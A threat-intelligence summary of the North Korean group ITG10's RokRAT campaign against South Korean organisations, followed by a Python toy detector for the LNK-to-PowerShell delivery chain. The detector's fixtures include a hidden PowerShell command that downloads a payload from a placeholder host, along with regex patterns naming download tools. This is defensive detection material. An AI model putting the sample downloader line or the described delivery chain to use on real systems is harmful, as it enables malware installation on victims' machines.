South Korean Industries Under Attack by North Korean APT
Category: Threat Actor Activity | Industries: Civil, Communication, Education, Energy, Government, Manufacturing, Think Tanks | Source: IBM

The North Korean APT group ITG10 has been identified as conducting a large-scale cyber campaign against a range of South Korean entities. According to a report from IBM Security X-Force, the campaign targets organizations in the communication, education, energy, government, manufacturing and supply chain sectors, as well as think tanks and dissident groups. ITG10 shares tactics, techniques and procedures with APT37 (aka ScarCruft, Ricochet Chollima), leading to an assessment that the two threat groups overlap. As part of its attack strategy, ITG10 uses malicious lure documents to distribute malware, including a remote access trojan named RokRAT. Lure documents attributed to ITG10 have covered geopolitical news and its media coverage, media production for broadcasts, document proposals, and the agenda for a multi-group seminar.

The decoy documents are delivered inside a zip file or ISO container that also holds a shortcut (LNK) file. The LNK launches a PowerShell script that opens the decoy document to distract the victim while RokRAT is downloaded in the background. X-Force also encountered another batch of potentially related malware: three distinct LNK files used to drop a VBS file rather than the usual batch script payload. Unfortunately, the final payload could not be retrieved, so its capabilities remain unknown, as does its association with ITG10 or any further link to APT37. "IBM X-Force assesses with high confidence that individuals and organizations holding strategic, political, or military information in connection with the Korean peninsula will see elevated threats from the DPRK, given ITG10’s previous and recent activity."

Anvilogic Scenario:

  • Malicious File Delivering Malware

Anvilogic Use Cases:

  • Compressed File Execution
  • Command Line .cmd Execution
  • Executable Create Script Process
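As an added illustration of how the delivery chain described above (archive or ISO, LNK, PowerShell opening a decoy while a download runs, LNK dropping a VBS) maps onto the three use cases listed, the following Python is a toy detection pass over constructed process-creation events. It is not code from IBM X-Force or Anvilogic: the event field names, the sample events, the rule names and the 10-minute correlation window are all assumptions made for this example, and the URL in the sample command line is a placeholder.

```python
"""Toy detection over constructed Windows process-creation events (added example).
Field names (host, ts, parent, image, cmd, cwd) are assumed, Sysmon-like shapes."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events: ws01 models the described LNK chain, ws02/ws03 are benign.
EVENTS = [
    {"host": "ws01", "ts": "2023-06-01T09:00:00", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": r'powershell.exe -w hidden -c "Start-Process .\agenda.docx; iwr http://placeholder.invalid/stage -OutFile $env:TEMP\stage.dat"',
     "cwd": r"C:\Users\u\AppData\Local\Temp\Temp1_seminar.zip\""},
    {"host": "ws01", "ts": "2023-06-01T09:00:02", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmd": r'cmd.exe /c "proposal.cmd"',
     "cwd": r"C:\Users\u\AppData\Local\Temp\Temp1_proposal.zip\""},
    {"host": "ws01", "ts": "2023-06-01T09:00:05", "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\wscript.exe",
     "cmd": r'wscript.exe "C:\Users\u\AppData\Local\Temp\upd.vbs"',
     "cwd": r"C:\Users\u\AppData\Local\Temp\Temp1_proposal.zip\""},
    {"host": "ws02", "ts": "2023-06-01T09:01:00", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmd": r'"WINWORD.EXE" "C:\Users\u\Documents\report.docx"',
     "cwd": r"C:\Users\u\Documents"},
    {"host": "ws03", "ts": "2023-06-01T09:02:00", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": r"powershell.exe -c Get-ChildItem",
     "cwd": r"C:\Users\u\Documents"},
]

# Extraction folders used by Explorer's built-in zip handling, 7-Zip and WinRAR (assumed patterns).
ARCHIVE_PATH = re.compile(r"\\Temp\\(Temp\d+_|7z[A-Za-z0-9]*|Rar\$)", re.I)
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "powershell.exe", "mshta.exe"}
# explorer.exe is excluded from the "executable spawns script host" rule to cut interactive noise.
NOT_AN_EXECUTABLE_PARENT = SCRIPT_HOSTS | {"explorer.exe"}
DOWNLOAD = re.compile(r"\b(iwr|invoke-webrequest|downloadstring|downloadfile|curl|wget)\b", re.I)
HIDDEN = re.compile(r"-w(indowstyle)?\s+hidden", re.I)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def match_rules(ev: dict) -> set:
    """Return the set of use-case rule names that fire for one event."""
    hits = set()
    img, parent, cmd = basename(ev["image"]), basename(ev["parent"]), ev["cmd"]
    # Compressed File Execution: process runs from an archive extraction folder.
    if ARCHIVE_PATH.search(ev["cwd"]) or ARCHIVE_PATH.search(ev["image"]):
        hits.add("compressed_file_execution")
    # Command Line .cmd Execution: cmd.exe launching a .cmd/.bat script.
    if img == "cmd.exe" and re.search(r"\.(cmd|bat)\b", cmd, re.I):
        hits.add("cmd_script_execution")
    # Executable Create Script Process: an ordinary executable spawns a script host.
    if img in SCRIPT_HOSTS and parent not in NOT_AN_EXECUTABLE_PARENT:
        hits.add("executable_creates_script_process")
    # LNK-style launch: explorer spawns hidden PowerShell that contains a downloader cmdlet.
    if (img == "powershell.exe" and parent == "explorer.exe"
            and HIDDEN.search(cmd) and DOWNLOAD.search(cmd)):
        hits.add("hidden_powershell_download")
    return hits


def correlate(events: list, window: timedelta = timedelta(minutes=10)) -> dict:
    """Scenario-style correlation: a host raises an alert when two or more
    distinct rules fire within the window. Returns {host: sorted rule names}."""
    per_host = defaultdict(list)
    for ev in events:
        for rule in match_rules(ev):
            per_host[ev["host"]].append((datetime.fromisoformat(ev["ts"]), rule))
    alerts = {}
    for host, hits in per_host.items():
        hits.sort()
        for t0, _ in hits:
            rules = {r for t, r in hits if t0 <= t <= t0 + window}
            if len(rules) >= 2:
                alerts[host] = sorted(rules)
                break
    return alerts


if __name__ == "__main__":
    for host, rules in correlate(EVENTS).items():
        print(f"ALERT {host}: {', '.join(rules)}")
```

Run stand-alone it reports only ws01, where all four rules fire within a few seconds; the benign Word launch on ws02 and the interactive PowerShell on ws03 match nothing, which is the point of requiring two distinct use cases before a scenario alert rather than alerting on any single rule.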
